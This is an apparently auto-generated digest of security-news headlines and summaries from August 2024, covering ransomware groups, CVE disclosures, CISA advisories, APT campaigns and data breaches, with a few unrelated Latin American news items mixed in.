          Autosummary: Identity is the new security perimeter: although 70% of respondents said they had an identity recovery plan, signaling strong progress towards IAM-centric security, only 27% reported having dedicated, AD-specific backup systems. Without AD-specific, malware-free backups and a tested, cyber-specific recovery plan, recovery will be prolonged, increasing the chance that the organization will decide to pay ransom to restore business operations.


          The BlackSuit ransomware gang has demanded over $500 million since 2022

          exploits ransomware
          2024-08-12 https://www.bitdefender.com/blog/hotforsecurity/the-blacksuit-ransomware-gang-has-demanded-over-500-million-since-2022/
          A notorious ransomware group has demanded more than half a billion dollars from victims in less than two years. Read more in my article on the Hot for Security blog.

          Autosummary: According to the CISA/FBI joint advisory: "Ransom demands have typically ranged from approximately $1 million to $10 million USD, with payment demanded in Bitcoin."


          Industrial Remote Access Tool Ewon Cosy+ Vulnerable to Root Access Attacks

          industry
          2024-08-12 https://thehackernews.com/2024/08/industrial-remote-access-tool-ewon-cosy.html
          Security vulnerabilities have been disclosed in the industrial remote access solution Ewon Cosy+ that could be abused to gain root privileges to the devices and stage follow-on attacks. The elevated access could then be weaponized to decrypt encrypted firmware files and encrypted data such as passwords in configuration files, and even get correctly signed X.509 VPN certificates for foreign

          Autosummary: "An unauthenticated attacker can gain root access to the Cosy+ by combining the found vulnerabilities and e.g., waiting for an admin user to log in to the device," Abrell said.


          EastWind campaign targets Russian organizations with sophisticated backdoors

          rusia-ucrania
          2024-08-12 https://securityaffairs.com/166924/apt/eastwind-campaign-targets-russian-organizations.html
          A campaign tracked as EastWind is targeting Russian government and IT organizations with the PlugY and GrewApacha backdoors. In late July 2024, Kaspersky researchers detected a series of targeted cyberattacks against the Russian government and IT organizations. Kaspersky named this campaign EastWind. Threat actors sent phishing emails with RAR archive attachments containing a Windows shortcut […]

          Autosummary: The attackers used the results of the utility’s work on their side as a unique key to encrypt the payload file, which can only be decrypted on the victim’s computer, after which they downloaded the following files to the infected computers: Attackers also employed a previously undetected malware dubbed PlugY, which is downloaded through the CloudSorcerer backdoor.


          Microsoft found OpenVPN bugs that can be chained to achieve RCE and LPE

          exploits
          2024-08-12 https://securityaffairs.com/166912/hacking/openvpn-rce-lpe.html
          Microsoft found four bugs in OpenVPN that could be chained to achieve remote code execution and local privilege escalation. During the Black Hat USA 2024 conference, Microsoft researchers disclosed multiple medium-severity bugs in the open-source project OpenVPN that could be chained to achieve remote code execution (RCE) and local privilege escalation (LPE). OpenVPN is an […]

          Autosummary: Vulnerabilities by CVE, affected component, impact and platform:
          • CVE-2024-24974 | openvpnserv | Unauthorized access | Windows
          • CVE-2024-27903 | openvpnserv | Remote code execution (RCE) | Windows
          • CVE-2024-27903 | openvpnserv | Local privilege escalation (LPE), data manipulation | Android, iOS, macOS, BSD
          • CVE-2024-1305 | Windows TAP driver | Denial of service (DoS) | Windows
          An attacker can exploit these vulnerabilities after obtaining a user’s credentials through different methods, such as purchasing them on the dark web, using an info stealer, or capturing NTLMv2 hashes from network traffic and cracking them with tools like HashCat or John the Ripper.


          Google Manifest V3 and Malwarebytes Browser Guard

          exploits
          2024-08-12 https://www.malwarebytes.com/blog/personal/2024/08/google-manifest-v3-and-malwarebytes-browser-guard
          We wanted to update you on some changes that Google’s making, and what we’re doing in Browser Guard to keep you protected.

          Autosummary: Browser Guard uses dynamic rules for two purposes: Session rules are dynamic rules that can be added and removed at runtime, but they are session-scoped and are cleared when the browser shuts down and when a new version of the browser is installed.


          How Phishing Attacks Adapt Quickly to Capitalize on Current Events

          financial
          2024-08-12 https://thehackernews.com/2024/08/how-phishing-attacks-adapt-quickly-to.html
          In 2023, no fewer than 94 percent of businesses were impacted by phishing attacks, a 40 percent increase compared to the previous year, according to research from Egress. What's behind the surge in phishing? One popular answer is AI – particularly generative AI, which has made it trivially easier for threat actors to craft content that they can use in phishing campaigns, like malicious emails

          Autosummary: When it comes to phishing, timing matters: unfortunately, AI and PhaaS have made phishing easier, and we should expect threat actors to continue adopting these sorts of strategies. Phishing and football: similar attacks played out during the UEFA Euro 2024 football championship. Most notably, threat actors launched fraudulent mobile apps that impersonated the UEFA, the sporting association that organized the event. One popular answer is AI – particularly generative AI, which has made it trivially easier for threat actors to craft content that they can use in phishing campaigns, like malicious emails and, in more sophisticated cases, deepfake videos.


          FreeBSD Releases Urgent Patch for High-Severity OpenSSH Vulnerability

          exploits
          2024-08-12 https://thehackernews.com/2024/08/freebsd-releases-urgent-patch-for-high.html
          The maintainers of the FreeBSD Project have released security updates to address a high-severity flaw in OpenSSH that attackers could potentially exploit to execute arbitrary code remotely with elevated privileges. The vulnerability, tracked as CVE-2024-7589, carries a CVSS score of 7.4 out of a maximum of 10.0, indicating high severity. "A signal handler in sshd(8) may call a logging function



          Australian gold producer Evolution Mining hit by ransomware

          exploits ransomware
          2024-08-12 https://www.bleepingcomputer.com/news/security/australian-gold-producer-evolution-mining-hit-by-ransomware/
          Evolution Mining has announced that it was targeted by a ransomware attack on August 8, 2024, which impacted its IT systems. [...]



          Google deactivates Russian AdSense accounts, sends final payments

          rusia-ucrania
          2024-08-12 https://www.bleepingcomputer.com/news/google/google-deactivates-russian-adsense-accounts-sends-final-payments/
          Google is notifying Russian YouTubers, bloggers, and publishers that their AdSense accounts are being deactivated and can no longer be used for advertising. [...] "

          Autosummary: "


          FBI disrupts the Dispossessor ransomware operation, seizes servers

          exploits ransomware
          2024-08-12 https://www.bleepingcomputer.com/news/security/fbi-disrupts-the-dispossessor-ransomware-operation-seizes-servers/
          The FBI announced on Monday that it seized the servers and websites of the Radar/Dispossessor ransomware operation following a joint international investigation. [...] "

          Autosummary: Since August 2023, Dispossessor—led by a threat actor known as Brain—has targeted small to mid-sized businesses in various sectors worldwide, claiming attacks against dozens of companies (the FBI identified 43 victims) from the U.S., Argentina, Australia, Belgium, Brazil, Honduras, India, Canada, Croatia, Peru, Poland, the United Kingdom, the United Arab Emirates, and Germany. "


          CISA Adds Six Known Exploited Vulnerabilities to Catalog

          exploits
          2024-08-12 https://www.cisa.gov/node/21966

          CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

          • CVE-2024-38189 Microsoft Project Remote Code Execution Vulnerability
          • CVE-2024-38178 Microsoft Windows Scripting Engine Memory Corruption Vulnerability
          • CVE-2024-38213 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
          • CVE-2024-38193 Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation Vulnerability
          • CVE-2024-38106 Microsoft Windows Kernel Privilege Escalation Vulnerability
          • CVE-2024-38107 Microsoft Windows Power Dependency Coordinator Privilege Escalation Vulnerability

          These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

          Binding Operational Directive (BOD) 22-01: Reduc "

          Autosummary: "


          Top 6 Craigslist scams: Don’t fall for these tricks

          financial
          2024-08-12 https://www.welivesecurity.com/en/scams/top-6-craigslist-scams-dont-fall-tricks/
          Here’s how to spot and dodge scams when searching for stuff on the classified ads website that offers almost everything under the sun "

          Autosummary: They want either full payment, or a downpayment on an expensive item, via a payment method that is hard to trace, and even harder for you to get reimbursed (i.e., wire transfer, crypto, Zelle, Venmo, Cash App, etc). Using secure payment methods like credit cards, even disposable ones, instead of paying via gift cards or cryptocurrency, two methods that are popular among fraudsters but difficult to trace and recover; being skeptical of third-party sites; refusing to share any personal or financial information in your communications with sellers and buyers; using disposable phone numbers and email addresses so that you further protect your main contact information. Consider the following: report the scam to the FTC (if you’re based in the US) and/or the FBI’s Internet Crime Complaint Center; keep a close eye on your bank and credit accounts and flag if there’s any suspicious activity; tell Craigslist that the listing was a scam, by clicking on the red flag icon and submitting a report; file a report with the police. Craigslist can be a great resource. "


          CISA Adds Six Known Exploited Vulnerabilities to Catalog

          exploits
          2024-08-12 https://www.cisa.gov/news-events/alerts/2024/08/13/cisa-adds-six-known-exploited-vulnerabilities-catalog

          CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

          • CVE-2024-38189 Microsoft Project Remote Code Execution Vulnerability
          • CVE-2024-38178 Microsoft Windows Scripting Engine Memory Corruption Vulnerability
          • CVE-2024-38213 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
          • CVE-2024-38193 Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation Vulnerability
          • CVE-2024-38106 Microsoft Windows Kernel Privilege Escalation Vulnerability
          • CVE-2024-38107 Microsoft Windows Power Dependency Coordinator Privilege Escalation Vulnerability

          These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

          Binding Operational Directive (BOD) 22-01: Reduc "

          Autosummary: "


          Week in review: Tips for starting your cybersecurity career, Patch Tuesday forecast

          ciber
          2024-08-11 https://www.helpnetsecurity.com/2024/08/11/week-in-review-tips-for-starting-your-cybersecurity-career-patch-tuesday-forecast/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: August 2024 Patch Tuesday forecast: Looking for a calm August release August 2024 July ended up being more ‘exciting’ than many of us wanted; we’re supposed to be in the height of summer vacation season. First, we had a large set of updates on Patch Tuesday, then we had to work through the CrowdStrike event, and finally many of us … More

          The post Week in review: Tips for starting your cybersecurity career, Patch Tuesday forecast appeared first on Help Net Security.

          "

          Autosummary: Number of incidents affecting GitHub, Bitbucket, GitLab, and Jira continues to rise Outages, human errors, cyberattacks, data breaches, ransomware, security vulnerabilities, and, as a result, data loss are the reality that DevSecOps teams have to face every few days, according to GitProtect.io. The featured vendors are: BackBox, Cybral, DryRun Security, HackNotice, Heeler Security, Hushmesh, MobileHop, Nagomi Security, Ox Security, Plainsea, Raven, Scribe Security, Spyderbat, and Xygeni. New infosec products of the week: August 9, 2024 Here’s a look at the most interesting products from the past week, featuring releases from: Rapid7, AppOmni, Contrast Security, Elastic, Cequence Security, Veza, ArmorCode, and EndorLabs. Securing against GenAI weaponization In this Help Net Security video, Aaron Fulkerson, CEO of Opaque, discusses how the weaponization of generative AI (GenAI) has made existing data privacy practices (like masking, anonymization, tokenization, etc.) "


          SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 6

          exploits
          2024-08-11 https://securityaffairs.com/166890/malware/security-affairs-malware-newsletter-round-6.html
          Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Surge in Magniber ransomware attacks impact home users worldwide BlankBot – a new Android banking trojan with screen recording, keylogging and remote control capabilities   LianSpy: new Android spyware targeting Russian users   Cloud Cover: How Malicious Actors […] "

          Autosummary: "


          ADT disclosed a data breach that impacted more than 30,000 customers

          financial
          2024-08-11 https://securityaffairs.com/166857/cyber-crime/adt-disclosed-a-data-breach.html
          Physical security firm ADT disclosed a data breach; threat actors stole information from 30,000 customers and leaked it. ADT is a provider of alarm and physical security systems; it employs more than 13,000 professionals in over 150 locations throughout the U.S. The company, which has over 6 million customers, disclosed a data breach following a […] "

          Autosummary: Compromised data includes customer emails, full addresses, user IDs, products bought, and more (FalconFeeds.io, @FalconFeedsio, August 1, 2024). The threat actor claimed that the data breach had exposed over 30,812 records, including 30,400 emails. "


          Cancer doctors and family with dog among Brazil plane crash dead

          latam
          2024-08-11 https://www.bbc.com/news/articles/cvg4mjx0124o
          As investigations continue into the crash that killed 62 people, more details emerge about the victims. "

          Autosummary: Their dog, Luna, boarded the plane with them, because Joslan’s mother could not stand to see him separated from their pet, said the family friend. "


          Chinese hacking groups target Russian government, IT firms

          government rusia-ucrania
          2024-08-11 https://www.bleepingcomputer.com/news/security/chinese-hacking-groups-target-russian-government-it-firms/
          A series of targeted cyberattacks that started at the end of July 2024, targeting dozens of systems used in Russian government organizations and IT companies, is linked to Chinese hackers of the APT31 and APT27 groups. [...] "

          Autosummary: Some things to look out for are: DLL files larger than 5MB in size in the "C:\Users\Public" directory; unsigned "msedgeupdate.dll" files in the file system; a running process named "msiexec.exe" for each logged-in user. The Russian cybersecurity firm concludes that APT27 and APT31 are likely working together in EastWind. "


          Foreign nation-state actors hacked Donald Trump’s campaign

          government
          2024-08-11 https://securityaffairs.com/166895/cyber-warfare-2/donald-trumps-campaign-hacked.html
          Donald Trump’s campaign reported that its emails were hacked by “foreign sources hostile to the United States.” Donald Trump’s presidential campaign announced it was hacked; a spokesman attributes the attack to foreign sources hostile to the United States. The presidential campaign believes that Iran-linked threat actors may be involved in the cyber operation that is […] "

          Autosummary: Pierluigi Paganini, August 11, 2024. Donald Trump’s campaign reported that its emails were hacked by “foreign sources hostile to the United States.” "


          Microsoft Warns of Unpatched Office Vulnerability Leading to Data Breaches

          financial exploits
          2024-08-10 https://thehackernews.com/2024/08/microsoft-warns-of-unpatched-office.html
          Microsoft has disclosed an unpatched zero-day in Office that, if successfully exploited, could result in unauthorized disclosure of sensitive information to malicious actors. The vulnerability, tracked as CVE-2024-38200 (CVSS score: 7.5), has been described as a spoofing flaw that affects the following versions of Office - Microsoft Office 2016 for 32-bit edition and 64-bit editions Microsoft "

          Autosummary: "


          Aerial video shows "horror scene" after Brazil plane crash

          latam
          2024-08-10 https://www.bbc.com/news/videos/ckg10mmne4mo
          All 61 people on board were killed when a Voepass plane came down in São Paulo state. "

          Autosummary: "


          In pictures: Brazil’s deadly plane crash

          latam
          2024-08-10 https://www.bbc.com/news/articles/cgl2430566yo
          Three days of mourning have been declared for those killed in the Voepass flight which crashed in Vinhedo. "

          Autosummary: "


          New Malware Hits 300,000 Users with Rogue Chrome and Edge Extensions

          exploits
          2024-08-10 https://thehackernews.com/2024/08/new-malware-hits-300000-users-with.html
          An ongoing, widespread malware campaign has been observed installing rogue Google Chrome and Microsoft Edge extensions via a trojan distributed via fake websites masquerading as popular software. "The trojan malware contains different deliverables ranging from simple adware extensions that hijack searches to more sophisticated malicious scripts that deliver local extensions to steal private data "

          Autosummary: "


          Bodies recovered after 62 die in Brazil plane crash

          latam
          2024-08-10 https://www.bbc.com/news/articles/c4gzpl2j260o
          Teams worked through the night to find victims of the disaster in São Paulo state which killed all on board. "

          Autosummary: Brazil’s civil aviation agency said the plane, which was built in 2010, had been "in good operating condition, with valid registration and airworthiness certificates". "


          Is the INC ransomware gang behind the attack on McLaren hospitals?

          exploits ransomware
          2024-08-10 https://securityaffairs.com/166851/cyber-crime/mclaren-hospitals-attack.html
          An INC Ransom ransomware attack this week disrupted IT and phone systems at McLaren Health Care hospitals. On Tuesday, an INC Ransom ransomware attack hit the McLaren Health Care hospitals and disrupted their IT and phone systems. The organizations did not disclose details about the attack; however, BleepingComputer noticed that employees at McLaren Bay […] "

          Autosummary: McLaren operates 14 hospitals in Michigan, ambulatory surgery centers, imaging centers, a 490-member employed primary and specialty care physician network, commercial and Medicaid HMOs covering more than 732,838 lives in Michigan and Indiana, home health, infusion and hospice providers, pharmacy services, a clinical laboratory network and a wholly owned medical malpractice insurance company. […] including billing or claims information, diagnosis, physician information, medical record number, Medicare/Medicaid information, prescription/medication information, diagnostic and treatment information. "


          Brazil’s "queen" Marta unlikely to play for country again

          latam government
          2024-08-10 https://www.bbc.com/sport/olympics/articles/cn5r42n5227o
          Brazil’s all-time leading goalscorer Marta said she has likely played her last game for her country. "

          Autosummary: "


          Four-try Argentina stun New Zealand in Wellington

          latam
          2024-08-10 https://www.bbc.com/sport/rugby-union/articles/c89wv9pn117o
          Veteran hooker Agustin Creevy scores the decisive try as Argentina stun New Zealand 38-30 in Wellington. "

          Autosummary: "


          NIS2: A catalyst for cybersecurity innovation or just another box-ticking exercise?

          ciber
          2024-08-09 https://www.helpnetsecurity.com/2024/08/09/nis2-cybersecurity-innovation-catalyst/

          The Network and Information Security (NIS) 2 Directive is possibly one of the most significant pieces of cybersecurity regulation to ever hit Europe. The 27 EU Member States have until 17 October 2024 to adopt and publish the standards necessary to comply with NIS2, which brings increased requirements to strengthen security conditions and report more regularly, with shorter deadlines, on cyber-attacks. The scope of the NIS2 directive has been dramatically broadened: in some countries, the … More

          The post NIS2: A catalyst for cybersecurity innovation or just another box-ticking exercise? appeared first on Help Net Security.

          "

          Autosummary: AI can also provide advanced security services, for example, leveraging filtering and threat prevention to prevent sophisticated web-based threats, zero-day threats, evasive command-and-control attacks and DNS hijacking attacks. Ex-ante or ex-post risk measures: Donald David Stewart Ferguson, an academic, argues that the limited effectiveness of the NIS2 Directive is primarily due to the narrow scope of the cybersecurity risk management measures, including the lack of specific measures focused on the reconnaissance phase of a cyberattack. Of course, sector-specific laws around cyber security already exist, but for businesses to achieve true holistic cybersecurity, they must adopt a tailored approach. "


          Malware-as-a-Service and Ransomware-as-a-Service lower barriers for cybercriminals

          exploits ransomware ciber
          2024-08-09 https://www.helpnetsecurity.com/2024/08/09/maas-threat-landscape/

          The sophistication of cyber threats has escalated dramatically, with malicious actors deploying advanced tactics, techniques, and procedures (TTPs) to exploit vulnerabilities and evade detection, according to Darktrace. Subscription-based tools such as Malware-as-a-Service (MaaS) and Ransomware-as-a-Service (RaaS) have also lowered the barrier-to-entry for less experienced attackers, making it easier to carry out complex, multistage attacks. “The threat landscape continues to evolve, but new threats often build upon old foundations rather than replacing them. While we have … More

          The post Malware-as-a-Service and Ransomware-as-a-Service lower barriers for cybercriminals appeared first on Help Net Security.

          "

          Autosummary: MaaS continues to pose significant risk for organizations The findings show that cybercrime-as-a-service continues to dominate the threat landscape, with Malware-as-a-Service (MaaS) and Ransomware-as-a-Service (RaaS) tools making up a significant portion of malicious tools in use by attackers. "


          CISA Warns of Hackers Exploiting Legacy Cisco Smart Install Feature

          exploits
          2024-08-09 https://thehackernews.com/2024/08/cisa-warns-of-hackers-exploiting-legacy.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has disclosed that threat actors are abusing the legacy Cisco Smart Install (SMI) feature with the aim of accessing sensitive data. The agency said it has seen adversaries "acquire system configuration files by leveraging available protocols or software on devices, such as abusing the legacy Cisco Smart Install feature." It also "

          Autosummary: "


          CISA adds Apache OFBiz and Android kernel bugs to its Known Exploited Vulnerabilities catalog

          exploits Linux
          2024-08-09 https://securityaffairs.com/166782/uncategorized/cisa-adds-apache-ofbiz-and-android-kernel-bugs-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache OFBiz and Android kernel bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Android Kernel Remote Code Execution flaw (CVE-2024-36971) and an Apache OFBiz Path Traversal issue (CVE-2024-32113) to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions of the […] "

          Autosummary: "


          Russian cyber spies stole data and emails from UK government systems

          government rusia-ucrania
          2024-08-09 https://securityaffairs.com/166795/intelligence/russia-hacked-uk-government-systems.html
          Earlier this year, Russian cyber spies breached UK government systems and stole sensitive data and emails, reported The Record media. Earlier this year, Russia’s foreign intelligence service stole internal emails and data on individuals from the UK government. The news was first reported by Recorded Future News, which obtained an official description of the incident […] "

          Autosummary: Pierluigi Paganini, August 09, 2024. Earlier this year, Russian cyber spies breached UK government systems and stole sensitive data and emails, reported The Record media. "


          “0.0.0.0-Day” vulnerability affects Chrome, Safari and Firefox

          exploits
          2024-08-09 https://www.helpnetsecurity.com/2024/08/09/0-0-0-0-day-vulnerability-affects-chrome-safari-and-firefox/

          A “0.0.0.0-Day” vulnerability affecting Chrome, Safari and Firefox can be – and has been – exploited by attackers to gain access to services on internal networks, Oligo Security researchers have revealed. The vulnerability stems from how those popular browsers handle network requests from external, public websites, and may allow attackers to change settings, gain access to protected information, upload malicious models, or even achieve remote code execution. Attacks abusing it can succeed on vulnerable browsers … More

          The post “0.0.0.0-Day” vulnerability affects Chrome, Safari and Firefox appeared first on Help Net Security.

          "

          Autosummary: The Private Network Access (PNA) specification makes a distinction between public, private, and local networks, and prevents pages loaded under a less-secure context (public network) from communicating with more-secure contexts (private network, local device), but it does not work when the request is sent to the 0.0.0.0 address. "


          New artefacts found on ‘holy grail of shipwrecks’ off Colombia

          latam
          2024-08-09 https://www.bbc.com/news/articles/c2kj0153zn0o
          An anchor and glass bottles are among the treasures found in the "unprecedented" haul, researchers say. "

          Autosummary: "


          New AMD SinkClose flaw helps install nearly undetectable malware

          exploits
          2024-08-09 https://www.bleepingcomputer.com/news/security/new-amd-sinkclose-flaw-helps-install-nearly-undetectable-malware/
          AMD is warning about a high-severity CPU vulnerability named SinkClose that impacts multiple generations of its EPYC, Ryzen, and Threadripper processors. The vulnerability allows attackers with Kernel-level (Ring 0) privileges to gain Ring -2 privileges and install malware that becomes nearly undetectable. [...] "

          Autosummary: According to AMD’s advisory, the following models are affected: EPYC 1st, 2nd, 3rd, and 4th generations; EPYC Embedded 3000, 7002, 7003, and 9003, R1000, R2000, 5000, and 7000; Ryzen Embedded V1000, V2000, and V3000; Ryzen 3000, 5000, 4000, 7000, and 8000 series; Ryzen 3000 Mobile, 5000 Mobile, 4000 Mobile, and 7000 Mobile series; Ryzen Threadripper 3000 and 7000 series; AMD Threadripper PRO (Castle Peak WS SP3, Chagall WS); AMD Athlon 3000 series Mobile (Dali, Pollock); AMD Instinct MI300A. AMD stated in its advisory that it has already released mitigations for its EPYC and AMD Ryzen desktop and mobile CPUs, with further fixes for embedded CPUs coming later. "


          Microsoft discloses Office zero-day, still working on a patch

          exploits
          2024-08-09 https://www.bleepingcomputer.com/news/security/microsoft-discloses-office-zero-day-still-working-on-a-patch/
          Microsoft has disclosed a high-severity zero-day vulnerability affecting Office 2016 and later, which is still waiting for a patch. [...] "

          Autosummary: The zero-day impacts multiple 32-bit and 64-bit Office versions, including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise. "


          Malware force-installs Chrome extensions on 300,000 browsers, patches DLLs

          exploits
          2024-08-09 https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/
          An ongoing and widespread malware campaign force-installed malicious Google Chrome and Microsoft Edge browser extensions in over 300,000 browsers, modifying the browser’s executables to hijack homepages and steal browsing history. [...] "

          Autosummary: ReasonLabs found the following Google Chrome extensions are linked to this campaign: Custom Search Bar (40K+ users); yglSearch (40K+ users); Qcom search bar (40+ users); Qtr Search (6K+ users); Micro Search Chrome Extension (180K+ users, removed from Chrome store). First, remove the scheduled task from the Windows Task Scheduler, looking for suspicious entries that point to scripts such as "NvWinSearchOptimizer.ps1," usually located in "C:\Windows\system32\." Secondly, remove the malicious registry entries by opening the Registry Editor ("Win+R" > regedit) and navigating to: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist; HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist; HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist; HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Edge\ExtensionInstallForcelist. Right-click each key with the malicious extension’s name and select "Delete" to remove them. "


          CSC ServiceWorks discloses data breach after 2023 cyberattack

          financial ciber
          2024-08-09 https://www.bleepingcomputer.com/news/security/csc-serviceworks-discloses-data-breach-after-2023-cyberattack/
          CSC ServiceWorks, a leading provider of commercial laundry services, has disclosed a data breach after the personal information of an undisclosed number of individuals was exposed in a 2023 cyberattack. [...] "

          Autosummary: "


          Five zero-days impact EoL Cisco Small Business IP Phones. Replace them with newer models asap!

          exploits
          2024-08-09 https://securityaffairs.com/166811/uncategorized/zero-days-eof-small-business-ip-phones.html
          Cisco warns of critical remote code execution zero-day vulnerabilities impacting end-of-life Small Business SPA 300 and SPA 500 series IP phones. Cisco warns of multiple critical remote code execution zero-day vulnerabilities in end-of-life Small Business SPA 300 and SPA 500 series IP phones. “Multiple vulnerabilities in the web-based management interface of Cisco Small Business SPA300 […] "

          Autosummary: Pierluigi Paganini, August 09, 2024. Cisco warns of critical remote code execution zero-day vulnerabilities impacting end-of-life Small Business SPA 300 and SPA 500 series IP phones. "


          CISA adds Apache OFBiz and Android kernel bugs to its Known Exploited Vulnerabilities catalog

          exploits Linux
          2024-08-09 https://securityaffairs.com/166782/hacking/cisa-adds-apache-ofbiz-and-android-kernel-bugs-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache OFBiz and Android kernel bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Android Kernel Remote Code Execution flaw (CVE-2024-36971) and an Apache OFBiz Path Traversal issue (CVE-2024-32113) to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions of the […] "

          Autosummary: "


          Plane crash in Brazil"s São Paulo state kills all 61 on board

          latam government
          2024-08-09 https://www.bbc.com/news/articles/c07e9x0d4p2o
          The passenger plane came down in the town of Vinhedo, Brazilian airline Voepass says. "

          Autosummary: “When I heard the sound of the plane falling, I looked out my window at home and saw the moment it crashed,” Felipe Magalhaes told Reuters news agency, adding that the sight left him "terrified". Another resident, Nathalie Cicari, told CNN Brasil she was having lunch when she heard a "very loud noise very close by", describing it like the sounds of a drone but "much louder". "


          This man travelled from Canada to Mexico on only public transport

          latam
          2024-08-09 https://www.bbc.com/news/articles/cg587pp5p2do
          William Hui made the journey along the US Pacific coast using only public buses and trains. "

          Autosummary: But earlier this year, he learned of a new, four-hour bus route that links Eureka, a city in northern California, to another city named Ukiah, about two hours north of San Francisco. "


          Ransomware operators continue to innovate

          exploits ransomware
          2024-08-08 https://www.helpnetsecurity.com/2024/08/08/ransomware-operators-innovate/

          Ransomware groups continue to refine their craft, building and scaling business models that resemble legitimate corporate enterprises, according to Rapid7. They market their services to prospective buyers, offer company insiders commissions in exchange for access, and run formal bug bounty programs. In addition, Rapid7 researchers found three major clusters of ransomware families with similar source code, indicating that ransomware groups are focusing their development efforts on quality over quantity. “The Ransomware Radar Report uses data … More

          The post Ransomware operators continue to innovate appeared first on Help Net Security.

          "

          Autosummary: "


          Photos: Black Hat USA 2024 Startup City

          government
          2024-08-08 https://www.helpnetsecurity.com/2024/08/08/photos-black-hat-usa-2024-startup-city/

          Here’s a look inside Startup City at Black Hat USA 2024. The featured vendors are: BackBox, Cybral, DryRun Security, HackNotice, Heeler Security, Hushmesh, MobileHop, Nagomi Security, Ox Security, Plainsea, Raven, Scribe Security, Spyderbat, and Xygeni.

          The post Photos: Black Hat USA 2024 Startup City appeared first on Help Net Security.

          "

          Autosummary: "


          Unlock the Future of Cybersecurity: Exclusive, Next Era AI Insights and Cutting-Edge Training at SANS Network Security 2024

          ciber
          2024-08-08 https://thehackernews.com/2024/08/unlock-future-of-cybersecurity.html
          The Immersive Experience Happening This September in Las Vegas! In an era of relentless cybersecurity threats and rapid technological advancement, staying ahead of the curve is not just a necessity, but critical. SANS Institute, the premier global authority in cybersecurity training, is thrilled to announce Network Security 2024, a landmark event designed to empower cybersecurity professionals "

          Autosummary: This includes a unique, 3-part add-on to your experience: extended OnDemand course, labs, and content access following the event from the course author, AIS247: AI Security Essentials for Business Leaders course, plus admission to the AI Cybersecurity Summit @Night event, further enriching the on-site learning experience. "


          FBI and CISA Warn of BlackSuit Ransomware That Demands Up to $500 Million

          exploits ransomware
          2024-08-08 https://thehackernews.com/2024/08/fbi-and-cisa-warn-of-blacksuit.html
          The ransomware strain known as BlackSuit has demanded as much as $500 million in ransoms to date, with one individual ransom demand hitting $60 million. That’s according to an updated advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). "BlackSuit actors have exhibited a willingness to negotiate payment amounts," the "

          Autosummary: The development comes amid the emergence of new ransomware families like Lynx, OceanSpy, Radar, Zilla (a Crysis/Dharma ransomware variant), and Zola (a Proton ransomware variant) in the wild, even as existing ransomware groups are constantly evolving their modus operandi by incorporating new tools into their arsenal. "


          FBI and CISA update a joint advisory on the BlackSuit Ransomware group

          exploits ransomware
          2024-08-08 https://securityaffairs.com/166760/hacking/blacksuit-ransomware-group-advisory.html
          FBI and CISA published a joint advisory on the BlackSuit Ransomware group; the document provides TTPs and IOCs observed as recently as July 2024. CISA, in collaboration with the FBI, has published a joint advisory on the BlackSuit Ransomware group. The advisory includes recent and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise […] "

          Autosummary: Historically, Royal actors were observed leveraging Chisel, Secure Shell (SSH) client, PuTTY, OpenSSH, and MobaXterm for C2 communications. "


          Rhysida Ransomware group claims to have breached Bayhealth Hospital in Delaware

          exploits ransomware
          2024-08-08 https://securityaffairs.com/166749/cyber-crime/rhysida-ransomware-bayhealth-hospital.html
          The Rhysida Ransomware group claims to have breached Bayhealth Hospital in Delaware and offers alleged stolen data for 25 BTC. Bayhealth Hospital is a technologically advanced not-for-profit healthcare system with nearly 4,000 employees and a medical staff of more than 450 physicians and 200 advanced practice clinicians. Bayhealth Medical Center, serving central and southern Delaware, […]

          Autosummary: Bayhealth Medical Center, serving central and southern Delaware, operates two hospitals: Bayhealth Hospital, Kent Campus in Dover and Bayhealth Hospital, Sussex Campus in Milford, along with the Bayhealth Emergency Center in Smyrna. The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors.


          Microsoft 365 anti-phishing alert “erased” with one simple trick

          financial
          2024-08-08 https://www.helpnetsecurity.com/2024/08/08/microsoft-365-alert-erased/

          Attackers looking for a way into organizations using Microsoft 365 can make an alert identifying unsolicited (and thus potential phishing) emails “disappear”. “When an Outlook user receives an e-mail from an address they don’t typically communicate with, Outlook shows an alert which reads ‘You don’t often get email from xyz@example.com. Learn why this is important’. This is what Microsoft calls the First Contact Safety Tip, and it is one of the various anti-phishing measures available … More

          Autosummary: And while the email preview will still show the Safety Tip, the body of the email won't: The alert can't be seen in the email body (Source: Certitude) Similarly, to improve the chances of the email being considered legitimate and benign, phishers can also add more HTML code to fake Outlook's "Signed by xyz@example.com" declaration.


          “Perfect” Windows downgrade attack turns fixed vulnerabilities into zero-days

